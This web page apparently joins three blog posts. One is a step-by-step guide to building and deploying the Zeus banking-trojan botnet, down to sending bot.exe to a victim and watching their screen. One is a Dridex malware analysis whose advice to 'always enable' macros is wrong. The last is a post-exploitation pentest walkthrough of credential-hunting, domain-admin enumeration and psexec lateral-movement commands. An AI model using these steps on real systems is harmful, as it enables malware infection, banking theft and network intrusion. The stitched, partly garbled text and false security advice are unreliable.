The best aspect of going digital lies ín the convenience of having a computer that replaces physical activity. Some say remote administration tool is counterproductive to the human function. However, remote administration tool has more pros than cons. Being connected is one such advantage. You can have access to any computer, and distance may not matter.

Remote Access Control or RAT is a software. It allows a certain user to control any system even without physical access to it. Thus, the remote “operator” gains full control over the device.

Although RAT and desktop sharing has legal uses, this type of software is often used in malicious activity. The operator can control RAT through a network connection. This is more so because it hides from detection by security software.

RATs can take on a number of activities when activated in a “client” computer. Apart from gathering login and account information, RATs can also format drives. Additionally, RATs can install applications silently. They can also run and operate without the victim’s knowledge.

Guide to set up Remote Administration Tool (RAT) Zeus BotNet:

This guide will help in setting up Remote Administration Tool (RAT) Zeus BotNet. However, the guide requires download of the software. We also need a database server and web server for this task.

Zeus or Zbot is the infamous Trojan horse that was spread through phishing schemes and drive-by downloads. It installs itself and uses form grabbing and keystroke logging to steal banking information. In 2009, Zeus compromised over 74,000 FTP accounts in company websites. Such companies included the Bank of America and NASA.

In 2010, Internet security providers claimed the creator of Zeus was retiring. As a result, he was to sell the code to his competitor, SpyEye Trojan creator. Experts later retracted this statement. They said that it was a ruse and that the developer might come back with new tricks. Binaries and source code are on GitHub since 2011.

How to setup Zeus Botnet RAT:

  1. The first thing to do is have a database server and web server running. Download XAMPP here to use for this task. Make sure that you have it up and running, as well as your MySQL service.
  2. In your internet browser, type http://localhost/phpmyadmin. Next, enter the username and password. Afterward, key in the default username root and leave the password blank. Create a database after that. Use the database name earlier created to setup Remote Administration Tool later.

remote administration tool

  1. Download the RAT file and extract it. There are three main folders in the archive: builder, server (PHP) and other. On your XAMPP files, locate the htdocs folder (C:\xampp\htdocs) and create a new folder inside it (you can use <bot> as folder name). Finally, copy the contents of server[php] to C:\xampp\htdocs\bot.

remote administration tool

  1. Next, go back to your web browser and search http://localhost/install/bot. Supply the correct details in each of the fields.

remote administration tool

Your database server IP address will fill the host address in MySQL server. This is your IP address in XAMPP. Supply the database name in step 2, and fill the encryption key with any characters 1-255 in length. Afterward, proceed by clicking Install.

You might encounter an error while doing this step. The error says “Failed to connect to MySQL server: Host ‘myusername’ is not allowed to connect to this MySQL server.” Do the following to remedy this:

  1. First, open http://localhost/phpmyadmin. Click the Privileges tab where you will find an edit button. Next, click the button to modify the user root privileges.

remote administration tool

  1. Clicking the button will, as a result, lead you to the edit user page. Scroll down to see the login information. Click the Host to any host from localhost and then press the “Go” button. A dialogue box opens when it successfully installs.

remote administration tool


  1. You need to create and configure the Zeus bot client. On the builder folder, open the configuration file named config.txt. Change the url_server, url_loader, and url_config to match your settings. Also, remember to edit the path of webinjects.txt.

remote administration tool

  1. At this point, open the zsb.exe file. This opens a dialogue box. Follow the steps as numbered in the image. This will build your bot executable.

remote administration tool

  1. Bot executable and Bot config enables adding new files after step 6. These are the bot.exe and config.bin. Copy these files to the htdocs folder that we configured earlier (C:\xampp\htdocs\bot).


remote administration tool

  1. The way to test this is to send the bot.exe to the target victim. Say the victim executes the file, we can see and check through the attack server. Open your browser and key in http://localhost/bot/cp.php. Afterward, type your username and password.

remote administration tool

  1. Finally, you gain entry to the newly infected victim as seen from your browser. It has all the information. You can view right from your web interface. You can even see a screenshot of the desktop view of the victim.

remote administration tool


  • Zbot is very forward when it comes to attacks. The attacker can collect data and information of the infected victim. It can also obtain some very private and sensitive information of the victim. It can also monitor internet activities of the victim.
  • Zbot acts as a keylogger. Thus, it can capture login information. This means that it can save usernames and passwords entered in websites.
  • Since Zbot is a persistent Trojan, having an up-to-date internet security is key. Even then, this malware uses stealth technique and therefore it is tough to detect. Antivirus software might only manage to prevent some infection attempts.
  • The best form of protection against Zbot is vigilance about suspicious links from email and websites. Security experts advise users to avoid clicking anything that looks hostile. Staying on top of your pop-up settings can also help prevent Zbot infection.


Here is another interesting article on Firefox Plug-ins.



Users download and execute Malware into their systems through a number of ways. However, attachments are one of the most common ways. Users are easily tricked into clicking and downloading attachments. Furthermore, we use email for many transactions including online banking and as a result, emails make us vulnerable to criminal and fraudulent activity.

Dridex belongs to the banking Trojan type of malware that specializes in stealing bank account information. It is also known as the Bugat or Cridex.

This malware primarily targets Windows users. Dridex is disguised as an email attachment in Excel or Word file. As a result, it prompts the activation of macro which in turn downloads the Dridex malware opening the user to theft.

The primary goal of Dridex is to steal banking details. It steals details such as account names, numbers, and passwords. Additionally, it allows attackers to perform fraudulent transactions by illegally stealing identities. The software carries out injection attacks and installs a keyboard listener to the infected unit.

This malware stole an estimated £20 million in the UK. Similarly, it stole $10 million in the US  in 2015. Since then, Dridex has infiltrated more than 20 countries. In Septemeber 2016, experts said that the banking Trojan would target crypto-currency wallets such as Bitcoin and other forms.

You may be in danger of opening malware if you receive an email containing remittance advice for BACS. BACS refers to Banker’s Automated Clearing Services and it electronically processes financial transactions in the United Kingdom. Most victims come from the United Kingdom.


The email comes with an Excel attachment named BAC_296422H.xls. This runs automatically once opened. However, that is usually the case when macros are enabled in Microsoft Office. The malicious document is detected as X97M/DownldExe.A.

The macro downloads and executes a WinPE file that is named “test.exe” coming from The downloaded executable is usually W32/DridLd.A.

W32/DridLd.A is a component downloader of the Dridex malware. It belongs to the Cridex family. W32/DridLd.A is arguably the heir of banking Trojans. W32/DridLd.A steals banking account information through HTML injections.

The W32/DridLd.A Masks as a Windows component thus making it a suspicious component. Upon closer inspection, one sees that the original and internal filename is a DLL type. The file type is specified as an in32 EXE.


A debugger reveals a compressed executable. It is stored and encrypted in the .data section. Unpacking the executable further opens to a compressed server config.



The unpacked .data section contains a list of the servers. The malware component, Dridex, is downloadable there.


Dridex collects some information before performing a POST to any of the listed servers. This system information includes the Computer name, Username, Windows version, Installation date, Application version, and finally the names. These applications are enumerated from HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall.

Next, the malware builds a data buffer in XML:

<loader><get_module unique=”v1″ botnet=”v2″ system=”v3″ name=”bot” bit=”v4″/><soft><![CDATA[v5]]></soft></loader>



v1 = %ComputerName%_%MD5 of the checksum of UserName and InstallDate%

v2 = %Numeric Botnet ID% (125 in this case)

v3 = %Checksum(MajorVersion|MinorVersion|ServicePackMinor|ServicePackMinor|SuiteMask)%

v4 = %List of applications enumerated from Uninstall key delimited by “;”%


The malware sends a POST request to a server in the server config. This is done using the stolen data contained in an encrypted XML data. Encryption simply uses an X0R operation with “x” as key.


The contacted BotNet server then sends a reply to the request. This response is in the form of an encrypted XML data. One can decrypt the response using the exact X0R operation.

The response is the decoded information including the main DLL component of the malware Dridex. It is then saved in the directory where the downloader XX.tmp was executed. The XX can have varying characters, as in the example 15.tmp. W32/Dridex.A poses as one Microsoft Library with filename MFC110CHS.DLL.


The W32/Dridex.A downloader component is packed through the same compression technique. The unpacked .sdata section contains compressed data as well. However, the data is compressed with a public key this time.


Rundll32.exe loads the main component. One can call it using the following syntax calls:

Rundll32.exe%path to Dridex DLL%NotifierInit


NotifierInit injects another copy of itself to explorer.exe. This happens after calling the main component with its exported function. Later, it deletes its file to avoid further detection from security scans

From there, the malware can perform malicious activities while injecting itself to the explorer.exe. It can monitor browser activities. Such browsers include Chrome, Firefox and Internet Explorer.

The malware then performs spyware functions. It grabs screenshots of the infected user’s desktop. Similarly, it also acts as a keylogger that saves account information.


Dealing with emails and documents entails being vigilant to suspicious attachments. Particularly, the Dridex malware attachment seems inconspicuous. However, it is very harmful once opened as its chain of infection is based on social engineering. Observant handling of such emails, therefore, prevents this malware.

Delete any email that you find suspicious or hostile and if possible, do not open the email. Emails originating from legitimate organizations should also be verified.

To prevent this malware, an antimalware solution with email coverage is essential. The software screens your emails. That way, one doesn’t have to worry about accidentally opening suspicious emails.

Contact your bank forthwith once infected with Dridex. Change your banking information and update your passwords as soon as possible. Apply this for any account you have input on the infected system.

One can prevent this malware by always enabling Macro settings in Microsoft. The possibility of it harming the system is significantly less when security is in place. This is because Dridex is a macro-based malware. I.T admins can also enforce group policies that push these settings.

Banking theft is a serious crime. Therefore, we always need to be on top of security when it comes to malware. Emails need heavy guarding as they are personal. Security breaches easily happen when people care less about their online activity.



Besides, click here to view my other article on DoD 8570.

Using APT tactics and techniques in your pentests

I have a student that has been asking me about internal network penetration testing. As a result, I figured I’d write a blog post about APT tactics. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy. On the other hand, moving around a network and stealing data without getting caught is the real skill. Certainly, you will want to use Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threat (APT).

When I do network penetration tests, I always explain to the customer that there are four levels of post exploitation. Therefore, they need to choose what level they want me to use based on the goals of the test.

  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from initially compromised hosts and move further to other hosts in the network.
  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials
  • Level 4:  Long term command and control (C2) – staying persistent in the environment for a prolonged period then exfiltrating data out of the network.

Meanwhile, I’ll try to cover a few of things we pentester’s do on internal pentests to data mine the network.

Data Mining The Host

At this point, you just broke into a machine with a browser, PDF, or Java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like ‘winenum.rb’, ‘enum_domain_user’, file_collector.rb, int_doc_find.rb or similar scripts. Even so, I am going to try to walk you through doing this stuff without meterpreter scripts and from here on, you will better understand what those scripts are doing or write your own.

Meanwhile, let’s start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a “/k” -i



APT tactics

Then, let’s figure out which updates got installed on this computer with DISM? Windows 7/8 (note: DISM will return far more details than WMIC.):

c:\DISM /Online /Get-Packages



APT tactics


c:\WMIC QFE List



APT tactics

ok, now that we have a regular command prompt, next, we will search the drive and sort the files by time accessed.

We can use this to find necessary files by typing:.

c:\dir C:\ /S /OD /TA

APTAPT tactics

Alternatively, if you know the date that a particular file got created, then you can search the drive and sort them by time created by typing:

c:\dir C:\ /S /OD /TC



APT tactics

Elsewhere, you can also do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:

c:\dir C:\ /S /OD /TW



APT tactics


Meanwhile, here is a trick that I use a lot presently is to search the drive for files with business-critical words in the file names. I type the following:

c:\dir c:\*bank* /s

APTAPT tactics


Even more, c:\dir c:\*password* /s

APTAPT tactics

Then, c:\dir c:\*pass* /s

APTAPT tactics

Even more, c:\dir c:\*competitor* /s

APTAPT tactics

Also, c:\dir c:\*finance* /s

APTAPT tactics

This is another set of goodies for financial and risk related data.

c:\dir c:\*invoice* /s

c:\dir c:\*risk* /s

c:\dir c:\*assessment* /s

Further, these are good when you are looking for specific file types, for instace, (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).

c:\dir c:\*.key* /s

c:\dir c:\*.vsd /s

c:\dir c:\*.pcf /s

c:\dir c:\*.ica /s

c:\dir c:\*.crt /s

c:\dir c:\*.log /s

Especially relevant, I look hard for .pcf and .ica files.

Anything that can give me legitimate access to the network. Besides, there is no better backdoor than authorized access.

As a matter of fact, I did have had a pentest where the customer had the password file with the name GeorgeBush.xlxs – (yes, every network has a password text file or spreadsheet). Evidently, a penetration tester before me found the password file when it was called passwords.Xlsx. Later, they renamed the file. However, one can search a drive for files with critical data by other means besides using their name. One can type:

c:\type c:\sysprep.inf

c:\type c:\sysprep\sysprep.xml

c:\findstr /I /N /S /P /C:password *

c:\findstr /I /N /S /P /C:secret *

c:\findstr /I /N /S /P /C:confidential *

c:\findstr /I /N /S /P /C:account *

c:\findstr /I /N /S /P /C:payroll *

c:\findstr /I /N /S /P /C:credit *

c:\findstr /I /N /S /P /C:record *

Show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests

Active Directory Enumeration

In the meantime, you have pilfered the host you compromised. It’s time to spread your wings and look for new prey in the network. Next, we will move on to active directory enumeration. For this reason, I will write another blog post on lateral movement later.

Often, I like using the net view command in looking for other hosts in the network.

c:\net view

APT tactics


In addition, We can run net view /domain to acquire a list of domains and workgroups in the target environment.

c:\net view /domain

APTAPT tactics
Next, let’s look for local users (Always check this. You’ll run into a network that uses local accounts for stuff every once in a while ). System administrators often make use of local users and groups sometimes. They employ them in system administration tasks as a means of restricting access to the domain. Strangely enough, this can be good if done very carefully. On the other hand, it could be atrocious as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\net user

APTAPT tactics

At this point, let’s grab a list of users in the domain.

c:\net user /domain

APTAPT tactics

For the same reason we checked for local users, it is necessary that we check for local groups as well.

c:\net localgroup

APTAPT tactics

Then, c:\net localgroup /domain

APTAPT tactics


Then, c:\net localgroup administrators

APTAPT tactics

Now, it’s time to get serious. The next few commands are where I get the best info.

c:\net localgroup administrators /domain

APTAPT tactics
Finding out the users in the domain is always handy. However, there is nothing like the next command.

c:\net group “Domain Users” /domain

At this point is where you make your money. Occasionally, I like to look for users in the Domain Admins group. After compromising my first host, then, I spear phish any user I find in the Domain Admins group. That’s rather the fastest way to gain domain admin level access for me.

c:\net group “Domain Admins” /domain

APTAPT tactics

net user “jima” /domain

APTAPT tactics

OK, at this point, let’s start moving around the network.

No Nmap – no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.

Meanwhile, more pingsweep.bat

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186

187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat

APT tactics

Afterward, all you have to do is just type ‘pingsweep‘ and then the first 3 octets of the target subnet.

pingsweep 10.10.30

APTAPT tactics

Meanwhile, if you need to generate a list of IP addresses you can use this quick for a loop.

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt

APTAPT tactics

further, let’s echo some domain names into a text file.

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt

more names.txt

APTAPT tactics

Then, we can use a for loop to look for logged in users

for /f “tokens=1” %a in (‘net view ^| find “\\”‘) do @echo %a >> hosts.txt

APTAPT tactics


After you come across machines where users are logged in, and you have their passwords or hashes, you can further PSExec the machines. Nonetheless, I acknowledge that I skipped password stealing and hash dumping. I will cover it in another article if you guys still want me to.

PSExec in Windows

c:\psexec.exe /accepteula \\ -u administrator -p [email protected]! cmd.exe

PSExec in Linux

Meanwhile, just for the sake of making sure that you have this syntax – here is how to do PSExec in Linux. I prefer to use a tool called
winexe. Besides, I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz


chmod 777 winexe

./winexe -U Administrator%[email protected]! //WIN7-X64-1 cmd.exe

APTAPT tactics


APTAPT tactics

Here is how I figure out how many users are logged on/connected to a server?


Finally, just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). At the same time, do all of the dir commands again, and you do all of the findstr commands again. Grab all of the necessary files then map a drive to what you want to become your staging server. Then, copy all of the necessary files to that staging server. In conclusion, here is how to map a network drive.

net use O: \\\c$  /u:administrator [email protected]!

net use /d O:


Whew, this was quite a long blog post. We covered a lot today, however, there is a lot we didn’t cover. We didn’t cover password stealing, hashdump, pass the hash, as well as data exfiltration.

Finally, I’d love it if you check out the Metasploit Next Level Video Series for only $50:

Let’s call it quits right there, and I’ll probably come back in a day or so and give you something else to chew.


Finally, please show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests